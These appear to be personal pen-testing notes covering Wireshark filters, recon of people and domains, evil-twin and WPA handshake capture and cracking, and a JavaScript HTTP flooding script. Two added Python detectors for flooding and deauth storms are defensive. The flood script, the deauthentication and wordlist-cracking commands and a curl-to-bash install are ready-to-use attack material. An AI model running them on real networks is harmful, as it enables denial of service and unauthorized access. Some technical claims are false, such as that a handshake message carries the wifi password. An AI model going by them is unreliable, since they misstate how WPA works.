Pen Testing
1 Wireshark
Reference: https://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
- address filters
ip.addr == 192.168.1.1      # matches the address in either src or dst
ip.src == 192.168.1.1
ip.dst == 192.168.1.1
tcp.port == 80              # there is no ip.port field; port filters live under tcp/udp
- content filters
frame contains "bleh"                  # literal substring anywhere in the frame
frame matches "some (girl|boy|man)"    # regular expression
- length filter
frame.len > 10 && frame.len < 300
- http filters
http.request.method == "POST"
http.response.code == 404
- protocols
- TCP, this is just https
- HTTP
- UDP, fast
- ARP, maps MAC addr to IP addr
- GUI techniques
- right click > Follow > TCP Stream
- File > Export Objects
- other handy filters
dns.qry.name contains "microsoft" or dns.qry.name contains "windows"
http.request || http.response
http.request or ssl.handshake.type == 1          # ssl.handshake.type == 1 is the TLS ClientHello
(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)         # 0x0002 = SYN only; udp 1900 = SSDP noise
(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)
2 Info Recon
spiderfoot -l 127.0.0.1:5009   # then open localhost:5009 and search emails, people, phone numbers
theHarvester finds people or hidden site domains (subdomains).
Example: find subdomains, limited to 200 hits, using Bing:
theHarvester -d kali.org -l 200 -b bing
theHarvester -d "John Doe" -l 200 -b linkedin
Other tools
- maltego - search for possible social network of target email
- twofi - list most used words of target twitter profile
- urlcrazy - list fat-fingered (typo) variants of a domain name
3 Evil twin attack
sudo apt install hcxdumptool
sudo apt install hcxtools
Download pyrit
curl https://raw.githubusercontent.com/Grezzo/pyrit-installer-for-kali-rolling/main/install-pyrit-kali-rolling-2021-1.sh | bash
sudo wifite -e StarBucksWifi
Restore wifi
sudo airmon-ng stop wlan0mon
wifite
4 Flooding network connection script
Requires CORS to be disabled in the Chrome browser.
var CONCURRENCY_LIMIT = 500
var queue = []
// `targets` (an array of URLs) and `targetStats` (per-target counters with
// number_of_requests and number_of_errored_responses) are used below but are
// not declared in these notes; they must be defined before the script runs.

async function fetchWithTimeout(resource, options) {
  const controller = new AbortController();
  const id = setTimeout(() => controller.abort(), options.timeout);
  return fetch(resource, {
    method: 'GET',
    mode: 'no-cors',
    signal: controller.signal
  })
  .then((response) => {
    clearTimeout(id);
    return response;
  })
  .catch((error) => {
    clearTimeout(id);
    throw error;
  });
}

async function flood(target) {
  for (var i = 0; ; ++i) {
    if (queue.length > CONCURRENCY_LIMIT) {
      await queue.shift()   // wait for the oldest request before queuing more
    }
    var rand = i % 3 === 0 ? '' : ('?' + Math.random() * 1000)   // random query string on 2 of 3 requests
    queue.push(
      fetchWithTimeout(target + rand, { timeout: 1000 })
      .catch((error) => {
        if (error.code === 20 /* ABORT */) {
          return;
        }
        targetStats[target].number_of_errored_responses++;
      })
      .then((response) => {
        if (response && !response.ok) {
          targetStats[target].number_of_errored_responses++;
        }
        targetStats[target].number_of_requests++;
      })
    )
  }
}

// Start
targets.map(flood)
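The defender-side counterpart, as an added example that is not part of the original notes: a small sliding-window detector for the request pattern this script produces (many requests per client per second, most of them carrying a random query string so caches cannot absorb them), run over constructed access-log lines in the common log format. The IPs, timestamps and paths are made up and the thresholds are illustrative; in practice the same logic sits in a WAF or rate limiter keyed on client IP.

```python
# Added example (not from the original notes): flags clients exceeding a
# request-rate threshold in a sliding window and reports how many of their
# requests carried a query string (the cache-busting signature).
import re
from collections import defaultdict, deque
from datetime import datetime

# Common/combined access-log format; only the fields we need are captured.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return {"ip": ip, "ts": datetime.strptime(ts, TIME_FMT),
            "method": method, "path": path, "status": int(status)}


def detect_floods(lines, window_s=10, threshold=20):
    """Flag any client that sends more than `threshold` requests inside a
    sliding window of `window_s` seconds.
    Returns {ip: (first_alert_ts, cache_buster_ratio)} where the ratio is the
    share of that client's in-window requests that carried a query string."""
    windows = defaultdict(deque)   # ip -> deque of (ts, has_query)
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue               # unparseable lines are skipped, not counted
        q = windows[rec["ip"]]
        q.append((rec["ts"], "?" in rec["path"]))
        while (rec["ts"] - q[0][0]).total_seconds() > window_s:
            q.popleft()            # drop requests that fell out of the window
        if len(q) > threshold and rec["ip"] not in flagged:
            ratio = sum(1 for _, has_q in q if has_q) / len(q)
            flagged[rec["ip"]] = (rec["ts"], ratio)
    return flagged


def build_sample_log():
    """Constructed log: one client firing 3 requests/s for 10 s with a random
    query string on two out of three requests, plus one ordinary client."""
    tmpl = '{ip} - - [15/Apr/2022:16:38:{sec:02d} +0000] "GET {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'
    lines = []
    n = 0
    for sec in range(10):
        for _ in range(3):
            path = "/" if n % 3 == 0 else f"/?{(n * 37) % 1000}.5"
            lines.append(tmpl.format(ip="203.0.113.9", sec=sec, path=path, status=200))
            n += 1
    for sec in range(0, 60, 12):   # a normal visitor: one request every 12 s
        lines.append(tmpl.format(ip="198.51.100.4", sec=sec, path="/index.html", status=200))
    return lines


if __name__ == "__main__":
    for ip, (ts, ratio) in detect_floods(build_sample_log()).items():
        print(f"ALERT {ip}: rate threshold crossed at {ts:%H:%M:%S}, {ratio:.0%} cache-busted requests")
```

The flooding client trips the alert on its 21st request, six seconds in, while the normal visitor never accumulates more than one request per window. A high cache-buster ratio on a static path is the extra signal that separates this script from a busy but legitimate client.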
5 Restoring network from monitor mode
sudo systemctl start NetworkManager.service
6 Very simple Wifi method
- WPS
- Evil twin
- Deauth
export AIRGEDDON_CHECK_DEPENDENCIES=false   # set these before launching
export AIRGEDDON_CHECK_UPDATES=false
export AIRGEDDON_SKIP_INTRO=true
sudo airgeddon
7 WiFi 4-way handshake attack
iwconfig   # find the wireless interface; here it is wlan1
# lo        no wireless extensions.
# eth0      no wireless extensions.
# wlan0     IEEE 802.11AC  ESSID:"BobWifi"  Nickname:"WIFI@XXXXXX"
#           Mode:Managed  Frequency:5.785 GHz  Access Point: XX:XX:XX:XX:XX
#           Bit Rate:434 Mb/s   Sensitivity:0/0
#           Retry:off   RTS thr:off   Fragment thr:off
#           Power Management:off
#           Link Quality=57/100  Signal level=-68 dBm  Noise level=0 dBm
#           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
#           Tx excessive retries:0  Invalid misc:0   Missed beacon:0
# wlan1     IEEE 802.11  ESSID:off/any
#           Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
#           Retry short limit:7   RTS thr:off   Fragment thr:off
#           Power Management:off
sudo airmon-ng start wlan1   # start monitor mode on wlan1; airmon-ng creates wlan1mon
sudo airmon-ng               # check monitor mode
# PHY   Interface   Driver      Chipset
# phy0  wlan0       rtl8821cu   Realtek Semiconductor Corp. 802.11ac NIC
# phy1  wlan1mon    ath9k_htc   Qualcomm Atheros Communications AR9271 802.11n
sudo airodump-ng wlan1mon    # scan SSIDs and channels; note the target's BSSID and CH
# BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
# XX:XX:XX:XX:XX:XX  -72       65     22    0   1  130  WPA2 CCMP   PSK  Bob
# XX:XX:XX:XX:XX:XX  -75       42      3    0  10  360  WPA2 CCMP   PSK  Ace
# XX:XX:XX:XX:XX:XX  -74       59     18    0  11  260  WPA2 CCMP   PSK  Gary
ESSID = Gary
BSSID = XX:XX:XX:XX:XX:XX
CH = 11
Open 2 terminals
# 1st terminal -> takes CH 11 and BSSID XX:XX:XX:XX:XX:XX as input, writes GaryDump-01.cap
sudo airodump-ng -w GaryDump -c 11 --bssid XX:XX:XX:XX:XX:XX wlan1mon
# 2nd terminal -> takes the BSSID as input
sudo aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX wlan1mon
# CH  6 ][ Elapsed: 54 s ][ 2022-04-15 16:38 ][ WPA handshake: XX:XX:XX:XX:XX:XX   <- THIS IS OUR GOAL
# BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
# XX:XX:XX:XX:XX:XX  -79   0      219      502    0   6  130  WPA2 CCMP   PSK  Gary
# BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
# XX:XX:XX:XX:XX:XX  A4:EA:1A:BA:BA:CA  -79   1e- 1e     0      462  EAPOL  Gary
# XX:XX:XX:XX:XX:XX  FA:A3:A3:AG:AA:A9  -80   0 - 6e     0       26
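From the defender's side, the deauthentication step above is exactly what a wireless IDS watches for. The following added example (not from these notes) flags a deauth/disassoc storm against a BSSID over constructed frame records; in a real deployment the tuples would come from a monitor-mode capture (for instance parsed with scapy), and the durable fix is enabling 802.11w Protected Management Frames so clients drop unauthenticated deauth frames. Addresses, timestamps and reason codes in the sample are made up.

```python
# Added example (not from the original notes): sliding-window detection of a
# deauthentication/disassociation storm, the signature of the aireplay step above.
from collections import defaultdict, deque

# 802.11 management frames are type 0; subtype 12 = Deauthentication,
# subtype 10 = Disassociation, subtype 8 = Beacon.
DEAUTH, DISASSOC, BEACON = 12, 10, 8
BROADCAST = "ff:ff:ff:ff:ff:ff"


def build_sample_frames():
    """Constructed records: (timestamp_s, type, subtype, bssid, dst, reason_code)."""
    frames = []
    for i in range(50):                      # benign beacons, one every 0.1 s
        frames.append((i * 0.1, 0, BEACON, "AA:BB:CC:DD:EE:01", BROADCAST, None))
    # one legitimate deauth (reason 3 = station is leaving the network)
    frames.append((1.0, 0, DEAUTH, "AA:BB:CC:DD:EE:01", "11:22:33:44:55:66", 3))
    # a storm: 40 broadcast deauths in 0.4 s against a second BSSID
    for i in range(40):
        frames.append((2.0 + i * 0.01, 0, DEAUTH, "AA:BB:CC:DD:EE:02", BROADCAST, 7))
    frames.sort(key=lambda f: f[0])
    return frames


def detect_deauth_storm(frames, window_s=1.0, threshold=10):
    """Alert on any BSSID that sees more than `threshold` deauth/disassoc
    frames within a sliding window of `window_s` seconds.
    Returns {bssid: (alert_time, frames_in_window, broadcast_fraction)}.
    A high broadcast fraction is a strong hint of injection: a client that
    really leaves deauths itself, it does not deauth everybody."""
    windows = defaultdict(deque)             # bssid -> deque of (ts, dst)
    alerts = {}
    for ts, ftype, subtype, bssid, dst, _reason in frames:
        if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
            continue                         # only management deauth/disassoc count
        q = windows[bssid]
        q.append((ts, dst))
        while ts - q[0][0] > window_s:       # drop frames that fell out of the window
            q.popleft()
        if len(q) > threshold and bssid not in alerts:
            bcast = sum(1 for _, d in q if d == BROADCAST) / len(q)
            alerts[bssid] = (ts, len(q), bcast)
    return alerts


if __name__ == "__main__":
    for bssid, (ts, n, bcast) in detect_deauth_storm(build_sample_frames()).items():
        print(f"ALERT {bssid}: {n} deauth/disassoc frames in 1 s at t={ts:.2f}s, "
              f"{bcast:.0%} broadcast")
```

The single legitimate deauth on the first BSSID never reaches the threshold, while the second BSSID alerts on its 11th frame, 0.1 s into the storm, with every frame addressed to broadcast. Tune `threshold` and `window_s` to the site's normal churn before trusting the alert.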
Theory
Open GaryDump-01.cap in Wireshark and filter by "eapol". The Info column shows:
    (Message 1 of 4)
    (Message 2 of 4)   <--
    (Message 3 of 4)
    (Message 4 of 4)
Those four packets are the WPA 4-way handshake.
Message 2 of 4 shows us the WPA Key Data, which is the password sent by the auto-connecting phone to the router.
Packet = [Source: Phone   Destination: Router   Protocol: EAPOL   Info: (Message 2 of 4)]
    Frame 8086: ...
    IEEE 802.11 ...
    Logical-Link Control ...
    802.1X Authentication
        Version: 802.1X-2001
        Type: Key (3)
        Length: 117
        Key Descriptor Type: EAPOL RSN Key (2)
        ...
        WPA Key Data: 91390283108123981298
Bruteforcing
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz    # unpack the wordlist once
aircrack-ng GaryDump-01.cap -w /usr/share/wordlists/rockyou.txt
Aside: you can check whether your own password is in the rockyou list with
grep -i "mypass" /usr/share/wordlists/rockyou.txt
9 Evil twin
9.1 Checking password
aircrack-ng -a 2 -b ${bssid} -w "${tmpdir}${webdir}${currentpassfile}" "${et_handshake}"